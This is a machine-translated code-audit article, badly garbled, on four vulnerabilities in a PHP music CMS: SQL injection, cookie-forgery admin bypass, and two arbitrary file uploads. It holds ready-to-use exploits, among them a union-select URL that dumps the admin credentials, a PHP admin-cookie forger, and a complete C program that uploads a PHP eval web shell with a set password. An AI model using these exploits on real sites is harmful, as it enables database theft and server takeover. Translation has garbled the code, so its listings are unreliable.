Code Auditing: multiple vulnerabilities in avant-garde music

Multiple vulnerabilities are found when you read the code of "V2.0BETA (20130709.
1./home/libs/common. php Injection Vulnerability
The/home directory contains the index. php file. This file does not have any function, but contains/home/libs/common. php. The problem code is as follows:

<? Phpinclude_once (CSDJ_PATH. '/conn. php '); ob_start (); // permitted action $ dos = array ('drop', 'index', 'dance', 'gd ', 'gx ', 'pick', 'reco', 'feed', 'pic ', 'gbook', 'skin', 'blog '); // get the variable $ usym =$ _ SERVER ['HTTP _ host']; $ uall = explode (". ", $ usym); $ op = CS_Request (" op "); $ uid = CS_Request (" uid "); // problem parameter $ id = CS_Request (" id "); $ pages = CS_Request ("pages"); if (empty ($ uid) $ uid = $ uall [0]; $ op = (! Empty ($ op) & in_array ($ op, $ dos ))? $ Op: 'index'; if (empty ($ uid) exit ('sorry, the member UID is empty, and the parameter is incorrect! '); If ($ op = 'skin') {if (isset ($ _ COOKIE ["cd_name"]) {$ uid = $ _ COOKIE ["cd_id"];} else {exit ("<script> window. location = 'HTTP ://". cd_weburl. "/I/login. php' </script> ") ;}} global $ db; $ row = $ db-> getrow (" Select * from ". tname ('user '). "where cd_id = ". $ uid. ""); // input query?>

In the code, $ uid is processed by CS_Request. If CS_Request is not filtered out, $ uid may be included in the following SQL statement for query. See the CS_Request Implementation below:

Function CS_Request ($ pi_strName, $ pi_Def = "", $ pi_iType = CS_TXT) {if (isset ($ _ GET [$ pi_strName]) $ t_Val = trim ($ _ GET [$ pi_strName]); else if (isset ($ _ POST [$ pi_strName]) $ t_Val = trim ($ _ POST [$ pi_strName]); else return $ pi_Def; // filter the numeric parameters if (CS_INT = $ pi_iType) {if (is_numeric ($ t_Val) return $ t_Val; else return $ pi_Def;} // String $ t_Val = str_replace ("&", "&", $ t_Val ); $ t_Val = str_replace ("<", "<", $ t_Val); $ t_Val = str_replace (">", ">", $ t_Val); if (get_magic_quotes_gpc ()) {$ t_Val = str_replace ("\\\" "," ", $ t_Val); $ t_Val = str_replace ("\\''","'", $ t_Val);} else {$ t_Val = str_replace ("\" "," ", $ t_Val); $ t_Val = str_replace ("'","'", $ t_Val);} return $ t_Val ;}

We can see that CS_Request has filtered out the numeric type, and CS_Request has filtered out the parameters &, <,>, ", and 'For the numeric type ,",'.
$ Uid is a numeric parameter. It should have been filtered out, but the call method of CS_Request in the Code is incorrect. The correct one should be
$ Uid = CS_Request ("uid", 0, CS_INT). The Calling method of the author is $ uid = CS_Request ("uid"), which is equivalent to $ uid for string filtering.
The single and double quotation marks are filtered for the string CS_Request, which should also be safe, but the SQL query statement:
$ Row = $ db-> getrow ("Select * from". tname ('user'). "where cd_id =". $ uid ."")
$ Uid is not included in single quotes. The security statement should be
$ Row = $ db-> getrow ("Select * from". tname ('user'). "where cd_id = '". $ uid ."'").
SQL Injection statement:
Http://www.0day5.com/home/index.php? Uid = 1 & op = 23and 1 = 2 union select 1, 2, 3, concat (CD_AdminUserName, 0x3c, 0x3c, CD_AdminPassWord), 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17,18, 19,20, 22, 24, 44, 45, 46 from musicdj_admin imit
2./admin/admin_check.php Permission Bypass Vulnerability
The above vulnerability is only injection and MD5 resolution, so the vulnerability can be directly added to the Administrator. Log on to the/admin directory and call this function to open a file: admincheck (7). Check the permission by name. The implementation of Admincheck is in/admin/admin_check.php:

Function admincheck ($ CD_Permission) {if ($ _ COOKIE ['CD _ permission'] <> '') {$ menuarr = explode (',', $ _ COOKIE ['CD _ permission']); $ adminlogined = 'false'; for ($ I = 0; $ I <count ($ menuarr); $ I ++) {if ($ menuarr [$ I] ==$ CD_Permission) {$ adminlogined = 'true' ;}} if ($ adminlogined = 'false ') {AdminAlert ('error. You are not authorized to access this page! ', '', 2) ;}} else {AdminAlert (' error. You are not authorized to access this page! ', '', 2) ;}}if (empty ($ _ COOKIE ['CD _ adminid']) {AdminAlert (' You do not have permission to access this page, this operation has been recorded! ', 'Admin _ login. php', 0);} elseif ($ _ COOKIE ['CD _ login']! = Md5 ($ _ COOKIE ['CD _ adminid']. $ _ COOKIE ['CD _ adminusername']. $ _ COOKIE ['CD _ adminpassword']. $ _ COOKIE ['CD _ permission']) {AdminAlert ('You have no Permission to access this page. This operation has been recorded! ', 'Admin _ login. php', 0 );}

Perform Two checks: 1. $ _ COOKIE ['CD _ permission'] must match the input parameter. 2. $ _ COOKIE ['CD _ login'] = md5 ($ _ COOKIE ['CD _ adminid']. $ _ COOKIE ['CD _ adminusername']. $ _ COOKIE ['CD _ adminpassword']. $ _ COOKIE ['CD _ permission'])
Both of the preceding conditions are met by the Administrator, and the program does not take any protection measures against $ _ COOKIE. After you can enter the background, you can add management and upload. You can use firefox's tamper data for forgery. Cookie Generation Code:

<?php$CD_Permission="1,2,3,4,5,6,7,8,9,10,11";$CD_AdminID=1;$CD_AdminUserName="ywledoc";$CD_AdminPassWord=123;$CD_Login=md5($CD_AdminID.$CD_AdminUserName.$CD_AdminPassWord.$CD_Permission);echo "CD_Permission=1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11;CD_AdminID=1;CD_AdminUserName=ywledoc;CD_AdminPassWord=123;CD_Login=".$CD_Login."<br>";?>

Generated: Listen = 1% 2C2% 2C3% 2C4% 2C5% 2C6% 2C7% 2C8% 2C9% 2C10% 2C11; CD_AdminID = 1; CD_AdminUserName = ywledoc; CD_AdminPassWord = 123; CD_Login = Login
After replacement, access/admin/admin_admin.php
3./admin/admin_mold.php Arbitrary File Upload Vulnerability (gpc off required)
Using the vulnerability above, an administrator is added. This step is started after logon. First look at the vulnerability code:

Function Save () {$ CD_Name =$ _ POST ['filename']; $ CD_Path =$ _ POST ['folder']; $ CD_TempName = $ _ POST ['tempname']; $ CD_Content = stripslashes ($ _ POST ['content']); $ F_Ext = substr (strrchr ($ CD_Name ,'. '), 1); $ FileType = strtolower ($ F_Ext ); if ($ FileType = 'htm 'or $ FileType = 'html' or $ FileType = 'shtml' or $ FileType = 'js' or $ FileType = 'css 'or $ FileType = 'txt ') {if (! $ Fp = fopen ($ CD_Path. $ CD_Name, 'w') {AdminAlert ('error, file '. $ CD_Path. $ CD_Name.' has no write permission! ','? Action = templist & tempname = '. $ CD_TempName. '& dir = '. $ CD_Path. '', 1) ;}$ ifile = new iFile ($ CD_Path. $ CD_Name, 'w'); $ ifile-> WriteFile ($ CD_Content, 3); AdminAlert ('Congratulations! template file edited! ','? Action = templist & tempname = '. $ CD_TempName.' & dir = '. $ CD_Path. '', 0);} else {AdminAlert (' error occurred. The operation has been disabled! ','? Action = templist & tempname = '. $ CD_TempName.' & dir = '. $ CD_Path. '', 1 );}}

Source code
If ($ FileType = 'htm 'or $ FileType = 'html' or $ FileType = 'shtml' or $ FileType = 'js' or $ FileType = 'css 'or $ FileType = 'txt ')
The suffix of the file to be saved is verified, but the path is merged $ CD_Path. $ CD_Name. If $ CD_Path does not perform any verification, you can directly pass in % 00 for truncation. However, % 00 is escaped by GPC, and most websites will open GPC, so this vulnerability is a little bad. Access
/Admin/admin_mold.php? Action = templist & tempname = % C4 % AC % C8 % CF % C4 % A3 % B0 % E6 & dir = .. /skin/index/9ku/, you can find a template to edit it and write your Trojan
Click Submit and use tamper data to intercept and modify data packets. A shell file similar to shopex will be generated directly.
4./admin/inc/uploads. php Arbitrary File Upload Vulnerability (register_globals must be ON)
Administrator upload process/admin/inc/upload. php->/admin/inc/upload/uploadify.swf->/admin/inc/uploads. php, the final implementation of file writing is in the last step, see/admin/inc/uploads. php implementation

Include ".. /.. /include/conn. php "; $ id = SafeRequest (" id "," get "); $ action = SafeRequest (" ac "," get "); switch ($ action) {case 'music': $ targetFiles = ".. /.. /upload/musicurl /". $ id. ". ". fileext ($ _ FILES ['filedata'] ['name']); $ fileexts = "*. mp3 ;*. wma "; $ filetypes =" song files "; break; case 'musicpic ': $ targetFiles = ".. /.. /upload/musicpic /". $ id. ". ". fileext ($ _ FILES ['filedata'] ['name']); $ fileexts = "*. jpg ;*. gif "; $ filetypes =" song pictures "; Break; case 'special ': $ targetFiles = ".. /.. /upload/special /". $ id. ". ". fileext ($ _ FILES ['filedata'] ['name']); $ fileexts = "*. jpg ;*. gif "; $ filetypes =" album image "; break;} if (! Empty ($ _ FILES) {$ tempFile = $ _ FILES ['filedata'] ['tmp _ name']; $ targetFile = $ targetFiles; // $ targetPath = $ _ SERVER ['document _ root']. $ _ REQUEST ['folder']. '/'; // $ targetFile = str_replace ('//', '/', $ targetPath ). $ _ FILES ['filedata'] ['name']; $ fileTypes = str_replace ('*. ', '', $ fileexts); $ fileTypes = str_replace ('; ',' | ', $ fileTypes); $ typesArray = split (' \ | ', $ fileTypes ); $ fileParts = pathinfo ($ _ FILES ['filedata'] ['name']); if (in_array ($ fileParts ['extension'], $ typesArray )) {// Uncomment the following line if you want to make the directory if it doesn't exist // mkdir (str_replace ('//', '/', $ targetPath ), 0755, true); // setcookie ("targetFile", $ targetFile, time () + 86400, "/"); move_uploaded_file ($ tempFile, $ targetFile );

$ Fileexts determines the upload type. $ targetPath determines the upload path, and both depend on $ action. If you enter an unreasonable $ action value, $ targetPath and $ fileexts are all undefined. When register_globals is ON, You can assign values to $ targetPath and $ fileexts through $ _ POST. In some cases, if register_globals is Off, the following code is required:
Foreach (array ('_ cookies',' _ Post', '_ get') as $ _ request) {foreach ($ _ request as $ _ key = >$ _ value) {$ _ key {0 }! = '_' & $ _ Key = daddslashes ($ _ value );}}
It is also a classic global variable Overwrite Vulnerability code. This code is not provided here. You can only rely ON register_globals to be ON. Similarly, register_globals is generally off, so this vulnerability is also a little tricky. The trainer wrote a piece of code for submitting the c post File, as follows:

# Include <stdio. h> # include <WinSock2.h> # include <Windows. h> # pragma comment (lib, "ws2_32") int main (int argc, char * argv []) {PVOID pBuff = NULL; SOCKET hSock = INVALID_SOCKET; int iResult = 0; WSADATA wsaData = {0}; sockaddr_in clientServer = {0}; hostent * pclientAddr = {0}; iResult = WSAStartup (MAKEWORD (2, 2), & wsaData ); if (iResult! = 0) return 0; do {if (argc! = 3) break; pBuff = VirtualAlloc (NULL, 0x200, MEM_COMMIT, PAGE_READWRITE); if (pBuff = NULL) break; sprintf (PCHAR) pBuff, "POST/% s/admin/inc/uploads. php HTTP/1.1 \ r \ n "" Host: % s \ r \ n "" User-Agent: Mozilla/5.0 \ r \ n "" Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8 \ r \ n "" Accept-Language: zh-cn, zh; q = 0.8, en-us; q = 0.5, en; q = 0.3 \ r \ n "" Accept-Encoding: gzip, deflate \ r \ n "" Connection: ke Ep-alive \ r \ n "" Content-Type: multipart/form-data; boundary = --------------------------- 1681160893454 \ r \ n "" Content-Length: 539 \ r \ n "" --------------------------- 1681160893454 \ r \ n "" Content-Disposition: form-data; name = \ "targetFiles \" \ r \ n "" \ r \ n "".. /.. /upload/special/ywledoc. php \ r \ n "" --------------------------- 1681160893454 \ r \ n "" Content-Disposition: form-data; name = \ "fileexts \" \ r \ n "\ r \ n" "*. Php \ r \ n "" ------------------------------- 1681160893454 \ r \ n "" Content-Disposition: form-data; name = \ "Filedata \"; filename = \ "yijuma. php \ "\ r \ n" "Content-Type: application/octet-stream \ r \ n" "\ r \ n" "<? Php eval ($ _ POST [paxmac])?> \ R \ n "" ----------------------------- 1681160893454 \ r \ n "" Content-Disposition: form-data; name = \ "submit \" \ r \ n "" \ r \ n "" Submit \ r \ n "" ----------------------------- 1681160893454 -- \ r \ n ", argv [2], argv [1]); hSock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); if (hSock = INVALID_SOCKET) break; clientServer. sin_family = AF_INET; clientServer. sin_port = htons (80); pclientAddr = gethostbyname (argv [1]); if (PclientAddr = NULL) {printf ("URL parsing error. Check the input! \ N "); break;} clientServer. sin_addr.s_addr = * (ULONG *) (pclientAddr-> h_addr_list [0]); if (connect (hSock, (sockaddr *) & clientServer, sizeof (sockaddr_in ))! = 0) {printf ("the connection to the server is rejected! \ N "); break;} send (hSock, (PCHAR) pBuff, strlen (PCHAR) pBuff), 0); printf (" the execution is complete. Please refer to the URL: % s/upload/special/ywledoc. php \ n ", argv [1], argv [2]); closesocket (hSock);} while (FALSE); WSACleanup (); return 0 ;}

After this code is executed, a ywledoc. php Trojan is generated in the/upload/special/directory, and the password is paxmac.